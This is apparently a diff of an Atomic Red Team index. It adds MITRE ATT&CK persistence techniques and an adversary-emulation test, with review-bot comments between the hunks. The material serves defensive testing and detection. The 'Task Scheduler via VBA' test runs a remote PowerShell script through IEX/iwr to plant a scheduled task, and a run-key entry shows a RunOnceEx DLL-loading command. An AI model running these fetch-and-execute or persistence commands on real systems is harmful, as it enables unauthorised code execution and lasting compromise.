@@ -14426,13 +14765,125 @@ persistence:
- Anti-virus
- Host intrusion prevention systems
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
x_mitre_is_subtechnique: false
atomic_tests: []
+ T1547.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.012
+ url: https://attack.mitre.org/techniques/T1547/012
+ - source_name: Microsoft AddPrintProcessor May 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
+ description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved
+ October 5, 2020.
+ - source_name: ESET PipeMon May 2020
+ url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
+ description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
+ Group. Retrieved August 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Print Processors
+ description: "Adversaries may abuse print processors to run malicious DLLs during
+ system boot for persistence and/or privilege escalation. Print processors
+ are DLLs that are loaded by the print spooler service, spoolsv.exe, during
+ boot. \n\nAdversaries may abuse the print spooler service by adding print
+ processors that load malicious DLLs at startup. A print processor can be installed
+ through the AddPrintProcessor API call with an account that has
+ SeLoadDriverPrivilege enabled. Alternatively, a print processor
+ can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet
+ or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture:
+ e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry
+ key that points to the DLL. For the print processor to be correctly installed,
+ it must be located in the system print-processor directory that can be found
+ with the GetPrintProcessorDirectory API call.(Citation: Microsoft
+ AddPrintProcessor May 2018) After the print processors are installed, the
+ print spooler service, which starts during boot, must be restarted in order
+ for them to run.(Citation: ESET PipeMon May 2020) The print spooler service
+ runs under SYSTEM level permissions, therefore print processors installed
+ by an adversary may run under elevated privileges."
+ id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T16:05:36.344Z'
+ created: '2020-10-05T13:24:49.780Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations.
+
+ Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
+ - File monitoring
+ - DLL monitoring
+ - API monitoring
+ x_mitre_contributors:
+ - Mathieu Tartare, ESET
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1542.004:
+ technique:
+ created: '2020-10-20T00:05:48.790Z'
+ modified: '2020-10-22T02:18:19.568Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc
+ description: |-
+ Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
+
+
+ ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.
+ name: ROMMONkit
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.004
+ url: https://attack.mitre.org/techniques/T1542/004
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: There are no documented means for defenders to validate the
+ operation of the ROMMON outside of vendor support. If a network device is
+ suspected of being compromised, contact the vendor to assist in further investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_data_sources:
+ - File monitoring
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ atomic_tests: []
T1037.004:
technique:
id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211
@@ -14675,6 +15126,14 @@ persistence:
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
source_name: Microsoft Run Key
+ - source_name: Microsoft Wow6432Node 2018
+ url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
+ description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data
+ in the Registry. Retrieved August 3, 2020.
+ - source_name: Malwarebytes Wow6432Node 2016
+ url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
+ description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved
+ August 3, 2020.
- url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key
description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry
Key. Retrieved June 29, 2018.
@@ -14697,26 +15156,30 @@ persistence:
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
- The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
+ Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
+
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
+
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
@@ -14734,9 +15197,9 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:16:26.182Z'
+ modified: '2020-08-03T16:30:26.918Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -15211,10 +15674,58 @@ persistence:
>$null 2>&1
'
+ - name: Task Scheduler via VBA
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
+ description: |
+ This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+ 30 - 40 seconds after this module has run
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
+ name: powershell
T1053:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:46.977Z'
+ modified: '2020-10-14T15:20:01.069Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Scheduled Task/Job
+ description: |-
+ Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
+
+ Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
external_references:
- source_name: mitre-attack
external_id: T1053
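Review bot: The `executor.command` of the added `Task Scheduler via VBA` test fetches `Invoke-MalDoc.ps1` from the `master` branch of a remote repository and runs it with `IEX`, so what executes at run time is whatever that branch holds then, not what this commit reviewed; pinning to an immutable ref, e.g. `.../invoke-atomicredteam/<PINNED_COMMIT_SHA>/Public/Invoke-MalDoc.ps1`, or vendoring the script next to `T1053.005-macrocode.txt`, keeps the test reproducible and under this repository's control. The `prereq_command` also runs `Stop-Process -Name $process`, which terminates every running `winword` process on the host, including any document the operator has open; keeping the COM object it just created (`$app = New-Object -COMObject "#{ms_product}.Application"`) and calling `$app.Quit()` on that instance avoids the collateral kill. The `iwr` call lacks `-UseBasicParsing`, which on Windows PowerShell 5.1 can fail where Internet Explorer's first-run configuration has not completed, so it is worth verifying against the `supported_platforms` target. The `atomic_tests` list this entry belongs to starts outside the hunk, and the rest of the hunk only reorders T1053 metadata.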
@@ -15226,35 +15737,21 @@ persistence:
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
source_name: TechNet Task Scheduler Security
- description: |-
- Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
-
- Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
- name: Scheduled Task/Job
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-24T13:45:04.006Z'
- created: '2017-05-31T21:30:46.977Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_remote_support: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -15265,19 +15762,18 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_version: '2.0'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1546.002:
technique:
@@ -15457,7 +15953,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-04-17T17:47:57.075Z'
+ modified: '2020-09-16T19:34:19.961Z'
created: '2019-06-28T17:52:07.296Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -15490,9 +15986,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.010
url: https://attack.mitre.org/techniques/T1574/010
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-17
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/17.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -15510,7 +16006,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:37:28.912Z'
+ modified: '2020-09-16T19:10:04.262Z'
created: '2020-03-12T20:43:53.998Z'
x_mitre_contributors:
- Travis Smith, Tripwire
@@ -15545,9 +16041,9 @@ persistence:
- source_name: mitre-attack
external_id: T1574.011
url: https://attack.mitre.org/techniques/T1574/011
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-478
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/478.html
- source_name: Registry Key Security
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
@@ -15598,7 +16094,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:01:09.906Z'
+ modified: '2020-09-16T19:07:48.590Z'
created: '2020-03-13T11:42:14.444Z'
x_mitre_defense_bypassed:
- Application control
@@ -15960,10 +16456,7 @@ persistence:
service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd
functionality to establish persistent access to victim systems by creating
and/or modifying service unit files that cause systemd to execute malicious
- commands at recurring intervals, such as at system boot.(Citation: Anomali
- Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation:
- Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation:
- acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries
+ commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries
typically require root privileges to create/modify service unit files in the
/etc/systemd/system and /usr/lib/systemd/system
directories, low privilege users can create/modify service unit files in directories
@@ -15977,6 +16470,12 @@ persistence:
- source_name: mitre-attack
external_id: T1543.002
url: https://attack.mitre.org/techniques/T1543/002
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- source_name: 'Linux man-pages: systemd January 2014'
url: http://man7.org/linux/man-pages/man1/systemd.1.html
description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
@@ -15989,18 +16488,6 @@ persistence:
url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With
a New Malware Family Written in Golang. Retrieved April 24, 2019.
- - source_name: gist Arch package compromise 10JUL2018
- url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
- description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
- Arch package compromise. Retrieved April 23, 2019.
- - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
- url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
- description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
- AUR Package Repository. Retrieved April 23, 2019.
- - source_name: acroread package compromised Arch Linux Mail 8JUL2018
- url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
- description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
- April 23, 2019.
- source_name: Rapid7 Service Persistence 22JUNE2016
url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
description: Rapid7. (2016, June 22). Service Persistence. Retrieved April
@@ -16011,7 +16498,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:13:59.473Z'
+ modified: '2020-10-09T13:46:29.701Z'
created: '2020-01-17T16:15:19.870Z'
x_mitre_platforms:
- Linux
@@ -16025,7 +16512,7 @@ persistence:
- User
- root
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
@@ -16100,6 +16587,137 @@ persistence:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
+ T1053.006:
+ technique:
+ id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
+ description: |-
+ Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)
+
+ Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
+
+ An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.
+ name: Systemd Timers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1053.006
+ url: https://attack.mitre.org/techniques/T1053/006
+ - source_name: archlinux Systemd Timers Aug 2020
+ url: https://wiki.archlinux.org/index.php/Systemd/Timers
+ description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
+ 12, 2020.
+ - source_name: 'Linux man-pages: systemd January 2014'
+ url: http://man7.org/linux/man-pages/man1/systemd.1.html
+ description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
+ Retrieved April 23, 2019.
+ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
+ AUR Package Repository. Retrieved April 23, 2019.
+ url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
+ source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
+ - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
+ Arch package compromise. Retrieved April 23, 2019.
+ url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
+ source_name: gist Arch package compromise 10JUL2018
+ - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
+ April 23, 2019.
+ url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
+ source_name: acroread package compromised Arch Linux Mail 8JUL2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-14T15:20:00.754Z'
+ created: '2020-10-12T17:50:31.584Z'
+ x_mitre_platforms:
+ - Linux
+ x_mitre_contributors:
+ - SarathKumar Rajendran, Trimble Inc
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
+
+ Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.
+
+ Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1542.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.005
+ url: https://attack.mitre.org/techniques/T1542/005
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Secure Boot
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure
+ Boot. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Command History
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
+ History. Retrieved October 21, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Boot Information
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
+ Information. Retrieved October 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: TFTP Boot
+ description: |-
+ Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
+
+ Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)
+ id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ modified: '2020-10-22T16:35:53.806Z'
+ created: '2020-10-20T00:06:56.180Z'
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device command history
+ - Network device configuration
+ - File monitoring
+ - Network device logs
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1547.003:
technique:
external_references:
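Review bot: The x_mitre_detection text of the new T1053.006 entry spells the flag with an en-dash, `systemctl list-timers –all`, so the command fails if copied verbatim; it should read `systemctl list-timers --all`. The same paragraph states that processes spawned this way have a parent PID of 1 and usually run as root, which holds only for system timers under /etc/systemd/system and /usr/lib/systemd/system; timers placed in ~/.config/systemd/user/ (which the description itself lists as the user-level location) are started by that user's `systemd --user` instance, so their parent PID is not 1 and they run as the unprivileged user. Since this index mirrors upstream ATT&CK STIX text, the correction presumably belongs in the upstream data or the generator rather than a hand edit here, but as written the detection guidance misses the user-level case the technique describes. Both new techniques are added with `atomic_tests: []`, consistent with the other untested entries in the index.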
@@ -16177,6 +16795,8 @@ persistence:
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
